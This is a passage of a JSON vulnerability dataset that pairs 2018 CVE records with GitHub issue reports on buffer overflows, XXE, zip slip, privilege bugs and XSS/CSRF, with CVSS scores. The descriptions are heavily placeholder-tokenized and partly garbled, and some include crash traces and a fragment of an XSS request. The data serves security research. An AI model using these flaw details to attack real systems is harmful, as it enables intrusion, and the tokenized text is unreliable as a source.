  29544. "description": "A stack overflow bug in NUMBERTAG Hello! I am learning AFL Fuzz recently,and I found a bug in this program POC is here URLTAG Please confirm Best regards APITAG RELEASE NUMBERTAG Environment gcc APITAG NUMBERTAG APITAG NUMBERTAG espruino test PATHTAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG cff6 at pc NUMBERTAG ff8ae NUMBERTAG b NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG cef0 sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG cff6 thread T NUMBERTAG ff8ae NUMBERTAG b NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG a NUMBERTAG f in APITAG APITAG NUMBERTAG e NUMBERTAG b in APITAG APITAG NUMBERTAG f7 in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG ac6 in APITAG APITAG NUMBERTAG d NUMBERTAG cc in run_test PATHTAG NUMBERTAG d NUMBERTAG f2 in main PATHTAG NUMBERTAG ff8ad NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG cff6 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG e6b5 in APITAG APITAG This frame has NUMBERTAG object(s NUMBERTAG filename' APITAG NUMBERTAG b9f NUMBERTAG f1 f1 f1 f NUMBERTAG f NUMBERTAG ba NUMBERTAG f4 f4 f3 f3 f3 f NUMBERTAG ba NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f NUMBERTAG ba NUMBERTAG f3 f NUMBERTAG ba NUMBERTAG ba NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f2 f2 f2 f2 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING WRLAB",
  29545. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29546. "severity": "HIGH",
  29547. "baseScore": 7.8,
  29548. "impactScore": 5.9,
  29549. "exploitabilityScore": 1.8
  29550. },
  29551. {
  29552. "CVE_ID": "CVE-2018-20213",
  29553. "Issue_Url_old": "https://github.com/devinsmith/libexcel/issues/8",
  29554. "Issue_Url_new": "https://github.com/devinsmith/libexcel/issues/8",
  29555. "Repo_new": "devinsmith/libexcel",
  29556. "Issue_Created_At": "2018-12-18T07:50:20Z",
  29557. "description": "It exists a buffer overflow when use APITAG Description When specify a long name as argument\uff0cit will be buffer overflow My test program FILETAG Command and argument gcc fsanitize=address ggdb o exampletest example1.c PATHTAG .c I PATHTAG Crash Information The output of exampletest with address sanitizer enabled APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG b7bc bp NUMBERTAG ffc NUMBERTAG bedf NUMBERTAG sp NUMBERTAG ffc NUMBERTAG bedf NUMBERTAG T NUMBERTAG b7bb in wbook_addworksheet PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fee4afe NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG wbook_addworksheet NUMBERTAG ABORTING CREDIT APITAG Weiran Labs",
  29558. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  29559. "severity": "HIGH",
  29560. "baseScore": 7.5,
  29561. "impactScore": 3.6,
  29562. "exploitabilityScore": 3.9
  29563. },
  29564. {
  29565. "CVE_ID": "CVE-2018-20226",
  29566. "Issue_Url_old": "https://github.com/TheHive-Project/Cortex/issues/158",
  29567. "Issue_Url_new": "https://github.com/thehive-project/cortex/issues/158",
  29568. "Repo_new": "thehive-project/cortex",
  29569. "Issue_Created_At": "2018-12-20T10:33:43Z",
  29570. "description": "Wrong checks of role when an user is created. Request Type Bug Work Environment Corte NUMBERTAG Problem Description The role of the user being created is not correctly check according to the role of the creating user. This implies that an organization admin is able create a super admin. Thank you, Po Hsing Wu.",
  29571. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  29572. "severity": "HIGH",
  29573. "baseScore": 7.2,
  29574. "impactScore": 5.9,
  29575. "exploitabilityScore": 1.2
  29576. },
  29577. {
  29578. "CVE_ID": "CVE-2018-20227",
  29579. "Issue_Url_old": "https://github.com/eclipse/rdf4j/issues/1210",
  29580. "Issue_Url_new": "https://github.com/eclipse/rdf4j/issues/1210",
  29581. "Repo_new": "eclipse/rdf4j",
  29582. "Issue_Created_At": "2018-12-18T07:46:53Z",
  29583. "description": "zip_slip. Hi all, There is a path traversal vulnerability found by Qihoo NUMBERTAG APITAG Team. Details as bellow: FILETAG When decompressing zip files, entries are not checked, resulting in overwriting arbitrary files by traversing directories using \u201c.. /\u201d",
  29584. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  29585. "severity": "HIGH",
  29586. "baseScore": 7.5,
  29587. "impactScore": 3.6,
  29588. "exploitabilityScore": 3.9
  29589. },
  29590. {
  29591. "CVE_ID": "CVE-2018-20301",
  29592. "Issue_Url_old": "https://github.com/smpallen99/coherence/issues/270",
  29593. "Issue_Url_new": "https://github.com/smpallen99/coherence/issues/270",
  29594. "Repo_new": "smpallen99/coherence",
  29595. "Issue_Created_At": "2017-08-22T15:51:51Z",
  29596. "description": "Coherence Security Issues. Thanks again for taking the time to talk with me. I'm opening an issue as per our conversation: The Coherence library has APITAG Assignment\" like vulnerabilities. In particular, \"registration\" endpoints (like creating, editing, updating), allow users to update any APITAG . This means that, among other issues, users can automatically confirm their accounts by sending the APITAG parameter with their registration request. Further, the library design and documentation encourages insecure functionality by default. For example: The \"store\" demo allows registering users to add themselves as admin: FILETAG Due to these issues, I would consider officially \"retiring\" the current version of Coherence in hex.",
  29597. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  29598. "severity": "MEDIUM",
  29599. "baseScore": 6.5,
  29600. "impactScore": 3.6,
  29601. "exploitabilityScore": 2.8
  29602. },
  29603. {
  29604. "CVE_ID": "CVE-2018-20302",
  29605. "Issue_Url_old": "https://github.com/smpallen99/xain/issues/18",
  29606. "Issue_Url_new": "https://github.com/smpallen99/xain/issues/18",
  29607. "Repo_new": "smpallen99/xain",
  29608. "Issue_Created_At": "2018-08-17T14:05:12Z",
  29609. "description": "[URGENT] Security Vulnerability. Since I haven't found your email, I encrypted the following report using your public keys on APITAG If you have problems reading this message please contact me either here or via APITAG . Message Encrypted CODETAG Keys APITAG APITAG Decryption CODETAG Responsible Disclosure After the time for responsible disclosure has passed, I'll comment the password for the message here.",
  29610. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  29611. "severity": "MEDIUM",
  29612. "baseScore": 6.1,
  29613. "impactScore": 2.7,
  29614. "exploitabilityScore": 2.8
  29615. },
  29616. {
  29617. "CVE_ID": "CVE-2018-20303",
  29618. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5558",
  29619. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5558",
  29620. "Repo_new": "gogs/gogs",
  29621. "Issue_Created_At": "2018-12-18T01:49:02Z",
  29622. "description": "Remote Code execution or|and Denial of Service. Gogs version (or commit ref): latest NUMBERTAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [X] No it's currently down I discovered a way to gain code execution (via a bypass of the authentication to gain admin access, very similar to URLTAG or to trigger a small denial of service. Can you confirm u APITAG is still the best email to send more details? Best, Louis",
  29623. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  29624. "severity": "HIGH",
  29625. "baseScore": 7.5,
  29626. "impactScore": 3.6,
  29627. "exploitabilityScore": 3.9
  29628. },
  29629. {
  29630. "CVE_ID": "CVE-2018-20304",
  29631. "Issue_Url_old": "https://github.com/devinsmith/libexcel/issues/9",
  29632. "Issue_Url_new": "https://github.com/devinsmith/libexcel/issues/9",
  29633. "Repo_new": "devinsmith/libexcel",
  29634. "Issue_Created_At": "2018-12-19T10:10:13Z",
  29635. "description": "It exists a buffer overflow when use APITAG Description When specify the second parameter \uff0cit will be buffer overflow My test program FILETAG Command and argument gcc fsanitize=address ggdb o exampletest example1.c PATHTAG .c I PATHTAG Crash Information The output of exampletest with address sanitizer enabled ERRORTAG CREDIT APITAG Weiran Labs",
  29636. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29637. "severity": "MEDIUM",
  29638. "baseScore": 6.5,
  29639. "impactScore": 3.6,
  29640. "exploitabilityScore": 2.8
  29641. },
  29642. {
  29643. "CVE_ID": "CVE-2018-20318",
  29644. "Issue_Url_old": "https://github.com/Wechat-Group/weixin-java-tools/issues/889",
  29645. "Issue_Url_new": "https://github.com/wechat-group/wxjava/issues/889",
  29646. "Repo_new": "wechat-group/wxjava",
  29647. "Issue_Created_At": "2018-12-20T08:13:52Z",
  29648. "description": "XXE\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG java tools\u9879\u76ee\u5b58\u5728XXE\u6f0f\u6d1e\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a APITAG FILETAG APITAG \u6b64\u5904\u662f\u4e00\u4e2axxe\u76f2\u6ce8\uff0c\u505a\u4e2a\u7b80\u5355\u7684\u590d\u73b0 APITAG FILETAG \u65e5\u5fd7\u4fe1\u606f FILETAG \u8fd8\u671b\u53ca\u65f6\u4fee\u590d",
  29649. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29650. "severity": "CRITICAL",
  29651. "baseScore": 9.8,
  29652. "impactScore": 5.9,
  29653. "exploitabilityScore": 3.9
  29654. },
  29655. {
  29656. "CVE_ID": "CVE-2018-20325",
  29657. "Issue_Url_old": "https://github.com/danijar/definitions/issues/14",
  29658. "Issue_Url_new": "https://github.com/danijar/definitions/issues/14",
  29659. "Repo_new": "danijar/definitions",
  29660. "Issue_Created_At": "2018-12-17T09:07:26Z",
  29661. "description": "APITAG method is vulnerable. coding=utf NUMBERTAG from definitions import Parser a = APITAG PATHTAG ) PATHTAG APITAG Hi, there is a vulnerability in APITAG method in parser.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  29662. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29663. "severity": "CRITICAL",
  29664. "baseScore": 9.8,
  29665. "impactScore": 5.9,
  29666. "exploitabilityScore": 3.9
  29667. },
  29668. {
  29669. "CVE_ID": "CVE-2018-20330",
  29670. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/304",
  29671. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/304",
  29672. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  29673. "Issue_Created_At": "2018-11-25T05:10:49Z",
  29674. "description": "integer overflow in APITAG I find the bug by code review; type of \"retval\" is int, \" stride ph \" is more than sizeof int, return type is unsigned long, cause function which call APITAG get a less value, then the function use the value as \"malloc\" argument, cause heap overflow DLLEXPORT unsigned long APITAG width, int pad, int height, int subsamp) { int retval NUMBERTAG nc, i; if (subsamp NUMBERTAG subsamp >= NUMSUBOPT) APITAG Invalid argument\"); nc = (subsamp == TJSAMP_GRAY NUMBERTAG for (i NUMBERTAG i < nc; i++) { int pw = APITAG width, subsamp); int stride = PAD(pw, pad); int ph = APITAG height, subsamp); if (pw NUMBERTAG ph NUMBERTAG return NUMBERTAG else retval += stride ph; } bailout: return retval; } \u279c build git:(master) \u2717 ./tjbench PATHTAG NUMBERTAG yuv Testing YUV planar encoding/decoding FILETAG",
  29675. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29676. "severity": "HIGH",
  29677. "baseScore": 8.8,
  29678. "impactScore": 5.9,
  29679. "exploitabilityScore": 2.8
  29680. },
  29681. {
  29682. "CVE_ID": "CVE-2018-20337",
  29683. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/192",
  29684. "Issue_Url_new": "https://github.com/libraw/libraw/issues/192",
  29685. "Repo_new": "libraw/libraw",
  29686. "Issue_Created_At": "2018-12-19T02:36:42Z",
  29687. "description": "Stack buffer overflow bug. Hello! I am learning AFL Fuzz recently,and I found a bug in this project. POC is here URLTAG Please confirm Best regards Version release NUMBERTAG Environment gcc APITAG NUMBERTAG APITAG NUMBERTAG disable shared ./raw identify POC Information APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffdcba9ac0 at pc NUMBERTAG f NUMBERTAG a NUMBERTAG c3 bp NUMBERTAG fffdcba NUMBERTAG sp NUMBERTAG fffdcba NUMBERTAG c8 WRITE of size NUMBERTAG at NUMBERTAG fffdcba9ac0 thread T NUMBERTAG f NUMBERTAG a NUMBERTAG c2 in __interceptor_strncpy ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG int) APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a9da2 in APITAG APITAG NUMBERTAG b5af2 in APITAG APITAG NUMBERTAG ce NUMBERTAG f in APITAG APITAG NUMBERTAG e4c7 in APITAG ) APITAG NUMBERTAG in APITAG const , long long) APITAG NUMBERTAG ERRORTAG c NUMBERTAG in main samples/raw APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG f8 in _start ( PATHTAG ERRORTAG NUMBERTAG f8) Address NUMBERTAG fffdcba9ac0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG d in APITAG int) APITAG This frame has NUMBERTAG object(s NUMBERTAG uc NUMBERTAG uc NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG c_len NUMBERTAG table_buf NUMBERTAG e_len NUMBERTAG tag NUMBERTAG type NUMBERTAG len NUMBERTAG save NUMBERTAG c NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG c NUMBERTAG table_buf NUMBERTAG e NUMBERTAG wb NUMBERTAG wb NUMBERTAG oly_lensid NUMBERTAG words NUMBERTAG APITAG NUMBERTAG yy NUMBERTAG mm NUMBERTAG dd NUMBERTAG APITAG NUMBERTAG buffer NUMBERTAG buf NUMBERTAG ystr NUMBERTAG ynum' APITAG NUMBERTAG b NUMBERTAG d NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f4 f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f4 f2 f2 f2 f NUMBERTAG f4 f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d3a NUMBERTAG f4 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING WRLAB",
  29688. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29689. "severity": "HIGH",
  29690. "baseScore": 8.8,
  29691. "impactScore": 5.9,
  29692. "exploitabilityScore": 2.8
  29693. },
  29694. {
  29695. "CVE_ID": "CVE-2018-20348",
  29696. "Issue_Url_old": "https://github.com/libyal/libpff/issues/48",
  29697. "Issue_Url_new": "https://github.com/libyal/libpff/issues/48",
  29698. "Repo_new": "libyal/libpff",
  29699. "Issue_Created_At": "2017-10-10T02:49:53Z",
  29700. "description": "A stack overflow vulneribility in libpff_item_tree_create_node. Tested Version Lastest (cloned from github) Command and argument ./pffexport APITAG Crash Information The output of pffexport with address sanitizer enabled, it seems the program falls into an infinite loop. ERRORTAG gdb and backtrace ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29701. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29702. "severity": "MEDIUM",
  29703. "baseScore": 5.5,
  29704. "impactScore": 3.6,
  29705. "exploitabilityScore": 1.8
  29706. },
  29707. {
  29708. "CVE_ID": "CVE-2018-20349",
  29709. "Issue_Url_old": "https://github.com/igraph/igraph/issues/1141",
  29710. "Issue_Url_new": "https://github.com/igraph/igraph/issues/1141",
  29711. "Repo_new": "igraph/igraph",
  29712. "Issue_Created_At": "2018-12-04T08:32:19Z",
  29713. "description": "NULL Pointer Dereference vulneribility in igraph_i_strdiff function. Test Version dev version, git clone URLTAG Test Program modify graphml.c in examples/simple directory ERRORTAG and APITAG APITAG Gdb and Backtrace CODETAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29714. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29715. "severity": "MEDIUM",
  29716. "baseScore": 6.5,
  29717. "impactScore": 3.6,
  29718. "exploitabilityScore": 2.8
  29719. },
  29720. {
  29721. "CVE_ID": "CVE-2018-20357",
  29722. "Issue_Url_old": "https://github.com/knik0/faad2/issues/28",
  29723. "Issue_Url_new": "https://github.com/knik0/faad2/issues/28",
  29724. "Repo_new": "knik0/faad2",
  29725. "Issue_Created_At": "2018-12-17T06:39:54Z",
  29726. "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function sbr_process_channel.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29727. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29728. "severity": "MEDIUM",
  29729. "baseScore": 5.5,
  29730. "impactScore": 3.6,
  29731. "exploitabilityScore": 1.8
  29732. },
  29733. {
  29734. "CVE_ID": "CVE-2018-20358",
  29735. "Issue_Url_old": "https://github.com/knik0/faad2/issues/31",
  29736. "Issue_Url_new": "https://github.com/knik0/faad2/issues/31",
  29737. "Repo_new": "knik0/faad2",
  29738. "Issue_Created_At": "2018-12-17T06:51:28Z",
  29739. "description": "Invalid memory address dereference in lt_prediction(in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function lt_prediction .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29740. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29741. "severity": "MEDIUM",
  29742. "baseScore": 5.5,
  29743. "impactScore": 3.6,
  29744. "exploitabilityScore": 1.8
  29745. },
  29746. {
  29747. "CVE_ID": "CVE-2018-20359",
  29748. "Issue_Url_old": "https://github.com/knik0/faad2/issues/29",
  29749. "Issue_Url_new": "https://github.com/knik0/faad2/issues/29",
  29750. "Repo_new": "knik0/faad2",
  29751. "Issue_Created_At": "2018-12-17T06:45:31Z",
  29752. "description": "Invalid memory address dereference in APITAG APITAG . Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29753. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29754. "severity": "MEDIUM",
  29755. "baseScore": 5.5,
  29756. "impactScore": 3.6,
  29757. "exploitabilityScore": 1.8
  29758. },
  29759. {
  29760. "CVE_ID": "CVE-2018-20360",
  29761. "Issue_Url_old": "https://github.com/knik0/faad2/issues/32",
  29762. "Issue_Url_new": "https://github.com/knik0/faad2/issues/32",
  29763. "Repo_new": "knik0/faad2",
  29764. "Issue_Created_At": "2018-12-17T06:55:49Z",
  29765. "description": "Invalid memory address dereference in sbr_process_channel (in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function sbr_process_channel .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29766. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29767. "severity": "MEDIUM",
  29768. "baseScore": 5.5,
  29769. "impactScore": 3.6,
  29770. "exploitabilityScore": 1.8
  29771. },
  29772. {
  29773. "CVE_ID": "CVE-2018-20361",
  29774. "Issue_Url_old": "https://github.com/knik0/faad2/issues/30",
  29775. "Issue_Url_new": "https://github.com/knik0/faad2/issues/30",
  29776. "Repo_new": "knik0/faad2",
  29777. "Issue_Created_At": "2018-12-17T06:49:16Z",
  29778. "description": "Invalid memory address dereference in hf_assembly (in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function hf_assembly .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29779. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29780. "severity": "MEDIUM",
  29781. "baseScore": 5.5,
  29782. "impactScore": 3.6,
  29783. "exploitabilityScore": 1.8
  29784. },
  29785. {
  29786. "CVE_ID": "CVE-2018-20363",
  29787. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/193",
  29788. "Issue_Url_new": "https://github.com/libraw/libraw/issues/193",
  29789. "Repo_new": "libraw/libraw",
  29790. "Issue_Created_At": "2018-12-19T03:43:52Z",
  29791. "description": "It exists a buffer overflow when use function APITAG Description When use function APITAG will be buffer overflow My test program NUMBERTAG channels in Libraw/bin Command and argument ./configure disable shared CFLAGS=\" fsanitize=address ggdb\" CXXFLAGS=\" fsanitize=address ggdb NUMBERTAG channels PATHTAG Crash Information ERRORTAG POC File FILETAG CREDIT APITAG Weiran Labs",
  29792. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29793. "severity": "MEDIUM",
  29794. "baseScore": 6.5,
  29795. "impactScore": 3.6,
  29796. "exploitabilityScore": 2.8
  29797. },
  29798. {
  29799. "CVE_ID": "CVE-2018-20364",
  29800. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/194",
  29801. "Issue_Url_new": "https://github.com/libraw/libraw/issues/194",
  29802. "Repo_new": "libraw/libraw",
  29803. "Issue_Created_At": "2018-12-21T02:55:05Z",
  29804. "description": "It exists SEGV when use function APITAG Description When use function APITAG will exist SEGV My test program postprocessing_benchmark in Libraw/bin Command and argument ./postprocessing_benchmark NUMBERTAG Crash Information ERRORTAG Version the commit is APITAG POC File FILETAG CREDIT APITAG Labs",
  29805. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29806. "severity": "MEDIUM",
  29807. "baseScore": 6.5,
  29808. "impactScore": 3.6,
  29809. "exploitabilityScore": 2.8
  29810. },
  29811. {
  29812. "CVE_ID": "CVE-2018-20365",
  29813. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/195",
  29814. "Issue_Url_new": "https://github.com/libraw/libraw/issues/195",
  29815. "Repo_new": "libraw/libraw",
  29816. "Issue_Created_At": "2018-12-21T03:48:38Z",
  29817. "description": "It exists heap buffer overflow when use function APITAG Description It exists heap buffer overflow in APITAG APITAG My test program NUMBERTAG channels in Libraw/bin Command and argument NUMBERTAG channels NUMBERTAG channels_crash Crash Information The output of exampletest with address sanitizer enabled ERRORTAG Version the commit is APITAG POC File FILETAG CREDIT APITAG Labs",
  29818. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29819. "severity": "MEDIUM",
  29820. "baseScore": 6.5,
  29821. "impactScore": 3.6,
  29822. "exploitabilityScore": 2.8
  29823. },
  29824. {
  29825. "CVE_ID": "CVE-2018-20367",
  29826. "Issue_Url_old": "https://github.com/wstmall/wstmart/issues/1",
  29827. "Issue_Url_new": "https://github.com/wstmall/wstmart/issues/1",
  29828. "Repo_new": "wstmall/wstmart",
  29829. "Issue_Created_At": "2018-12-22T13:06:50Z",
  29830. "description": "There are XSS vulnerabilities and CSRF vulnerabilities that can work together to add administrator users. Shang tao software APITAG e commerce system is a based on THINKPHP framework NUMBERTAG build B2B2C electric business platform, is now open source shopping system based on THINKPHP NUMBERTAG is the most perfect, with PC, mobile phone WAP, micro mall, android APP, the APP, APITAG applet, six side one, six side each other, have nowadays one of the most popular level NUMBERTAG distribution and function of micro bargaining, very suitable for enterprise and individual fast online business platform. The code of the system is clear and easy to understand, a large number of visual reports are convenient for operators to make decisions, rich marketing functions make the application scenarios of the system broad, good plug in mechanism makes the system more easy to expand. System operation is simple, safe and stable, update iteration is fast, is the majority of users direct use and secondary development of the best choice. Official address: FILETAG NUMBERTAG stored XSS Function point: mall some commodity details commodity consultation poc: POST PATHTAG HTTP NUMBERTAG Host: xx.xx.xx.xx User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG UM_distinctid NUMBERTAG d5b NUMBERTAG b NUMBERTAG d NUMBERTAG d7d NUMBERTAG d NUMBERTAG c NUMBERTAG e7e NUMBERTAG d5b NUMBERTAG e; CNZZDATA NUMBERTAG C NUMBERTAG APITAG NUMBERTAG CSRF NUMBERTAG Function point: background management staff management login account poc: FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  29831. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  29832. "severity": "MEDIUM",
  29833. "baseScore": 6.1,
  29834. "impactScore": 2.7,
  29835. "exploitabilityScore": 2.8
  29836. },
  29837. {
  29838. "CVE_ID": "CVE-2018-20407",
  29839. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/343",
  29840. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/343",
  29841. "Repo_new": "axiomatic-systems/bento4",
  29842. "Issue_Created_At": "2018-12-19T02:59:54Z",
  29843. "description": "Memory leaks in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to memroy leaks in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash3.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  29844. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29845. "severity": "MEDIUM",
  29846. "baseScore": 6.5,
  29847. "impactScore": 3.6,
  29848. "exploitabilityScore": 2.8
  29849. },
  29850. {
  29851. "CVE_ID": "CVE-2018-20409",
  29852. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/345",
  29853. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/345",
  29854. "Repo_new": "axiomatic-systems/bento4",
  29855. "Issue_Created_At": "2018-12-21T03:39:41Z",
  29856. "description": "Heap buffer overflow in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to heap buffer overflow failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash4.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  29857. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29858. "severity": "MEDIUM",
  29859. "baseScore": 6.5,
  29860. "impactScore": 3.6,
  29861. "exploitabilityScore": 2.8
  29862. },
  29863. {
  29864. "CVE_ID": "CVE-2018-20421",
  29865. "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/18289",
  29866. "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/18289",
  29867. "Repo_new": "ethereum/go-ethereum",
  29868. "Issue_Created_At": "2018-12-12T03:29:59Z",
